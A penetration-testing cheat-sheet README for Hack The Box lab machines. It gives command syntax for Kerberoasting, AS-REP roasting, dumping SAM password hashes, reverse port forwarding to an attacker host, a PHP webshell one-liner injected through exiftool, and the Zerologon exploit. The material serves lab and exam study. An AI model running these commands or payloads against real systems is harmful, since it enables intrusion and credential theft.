hackthebox

License: MIT

Notes taken for HTB machines.
Will be periodically updated; created with the intent of unwrapping all possible approaches and to prepare for exams.

created & maintained by: cyberwr3nch

Contents

Commands Reference

| File | Contents |
|---|---|
| Active Directory | Bruteforce SMB, WinRM bruteforce, AD user enumeration, mounting disks, BloodHound, rpcclient |
| Directory Enumeration | gobuster, rustbuster, wfuzz, vhosts |
| File Transfer | ftp, python, netcat, http, powershell curling, metasploit, smb, net use, Impacket |
| Nmap | Nmap, port scanning, tags |
| Notes | DNS recon, 302 redirects, Burp Suite, MySQL, passwd file, port forwarding |
| Password Cracking | hashcat, john, hash examples, zip file cracking |
| Post Exploitation | current user, network info, locate, antivirus disabling, registry, privileges, running processes, plink, stored credentials, wmic |
| Regular Commands | ls, grep, awk, curl, wget, compression and decompression of files, find, xclip, misc, bash loops, sed, tr, tail, watch |
| Reverse Shells | Bash TCP, Bash UDP, Netcat, Telnet, Socat, Perl, Python, PHP, Ruby, SSL, PowerShell, AWK, TCLsh, Java, Lua, MSF reverse shells (war, exe, elf, macho, aspx, jsp, python, sh, perl), Xterm, magic bytes, Exiftool, simple PHP one-liners |
| Web Attacks | SQL injection, login bruteforce (wfuzz, hydra) |
| Docker Commands | installation, building, pulling, updating, deleting, listing, cheatsheet |
| Git Commands | clone, commit, push, pull, add, log, deleted file, checkout |

Tools

Windows and Active Directory

| Tool | Use | Command Syntax |
|---|---|---|
| Bloodhound.py | BloodHound collector written in Python. Used to obtain AD information from a Windows machine | `python3 bloodhound-python -u <username> -p <passphrase> -ns <machineIP> -d <domainname> -c all` |
| Impacket | Swiss army knife for most Windows AD attacks | `python GetNPUsers.py <domain_name>/ -usersfile <users_file>` = AS-REP Roasting; `python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password>` = Kerberoasting |
| Kerbrute | A tool written in Go to enumerate AD users | `./kerbrute userenum --dc <machine ip> -d <domainname> <users_file>` |
| CredDump | Used to obtain cached credentials, LSA secrets and password hashes when the SYSTEM and SAM hive files are available | `./pwdump.py <system hive> <sam hive>` = obtain password hashes; `./cachedump.py <system hive> <sam hive>` = obtain cached credentials; `./lsadump.py <system hive> <sam hive>` = obtain LSA secrets |
| PwdDump | After getting administrative access, running this dumps the password hashes | `.\PwDump7.exe` |
| ApacheDirectoryStudio | LDAP browser used to analyze an LDAP instance running on Linux (creds required); here the LDAP port on the victim machine is forwarded and accessed from the attacker machine | `sudo ssh -L 389:172.20.0.10:389 [email protected]` |

Port Forwarding

| Tool | Use | Command Syntax |
|---|---|---|
| Chisel | Used to forward a service running on a port of the victim machine | `./chisel server -p <port no.> --reverse` = run on the attacker machine; `./chisel client <attackerip:port> R:1234:127.0.0.1:1121` = forwards the service running on port 1121 to port 1234 on the attacker machine |
| socat | Swiss army knife for port forwarding | `socat TCP-LISTEN:8000,fork TCP:<machineIP>:<port>` = listens for every connection on port 8000 and forwards it to machineIP and its port; `socat TCP-LISTEN:9002,bind=<specific ip>,fork,reuseaddr TCP:localhost:<port>` = forwards all incoming requests on port 9002 to the localhost port; `reuseaddr` tells socat to bind the address (e.g. localhost) even if it is still in use by other services |
| plink | PuTTY SSH in CLI mode | `.\plink.exe <user@host> -R <remote port>:<localhost>:<local port>`; `.\plink.exe [email protected] -R 8888:127.0.0.1:8888` = forwards the service running on the victim machine's port 8888 to the attacker machine's port 8888 |

Directory Enumeration

| Tool | Use | Command Syntax |
|---|---|---|
| DirSearch | Directory enumeration tool | `python3 dirsearch.py -u <url> -e <extn>` |
| Gobuster | Directory enumeration tool written in Go | `gobuster dir -u <url> -w <wordlist> -x <extn> -b <hide status code> -t <threads>` |
| RustBuster | Directory enumeration tool written in Rust | `rustbuster dir -u <url> -w <wordlist> -e <extn>` |

Post Exploitation

| Tool | Use | Command Syntax |
|---|---|---|
| LinEnum | Post-exploitation script that automates enumeration | `./LinEnum.sh` |
| LinPEAS | Post-exploitation enumeration script | `./linpeas.sh` |
| WinPEAS.bat/WinPEAS.exe | Windows post-exploitation enumeration script and exe | `.\winPEAS.bat` |

Misc

| Tool | Use | Command Syntax |
|---|---|---|
| Exiftool | Inspects the metadata of an image; injects a PHP payload into the comment field for file-upload vulns, which can be combined with a double extension such as `file.php.ext` (inner quotes changed to double quotes so the shell quoting is valid) | `./exiftool -Comment='<?php system($_GET["cmd"]); ?>' <image.ext>` |
| Git Dumper | Dumps the Git repo if a `.git` directory is found on the website | `./git-dumper.py <website/.git> <output folder>` |
| lxd-alpine-builder | When the victim machine is set up with lxc, the privesc is done following the article here | |
| Php-reverse-shell | PHP reverse shell; when an upload is possible, change the IP and make a request to obtain the reverse shell | |
| ZerologonPOC | CVE-2020-1472 exploit; sets the domain admin password as empty and dumps the secrets. PS: the latest version of Impacket is required | `python3 set_empty_pw.py machinename/domainname machine IP; secretsdump.py -just-dc -no-pass machinename\$@machineip` |
| Gopherus | SSRF with the gopher:// protocol | `gopherus --exploit phpmemcache` |

SAY NO TO MSF !

Admired Bloggers

These are the URLs that have the writeups for active and retired machines

nvm this

Constantly updating from MAY 3rd 2020

Thanks for visiting

A noob cyberwr3nch🔧 A member of TCSC Learn and Spread <3 xoxo💙

Support My contents

Dhanesh Sivasamy's Twitter
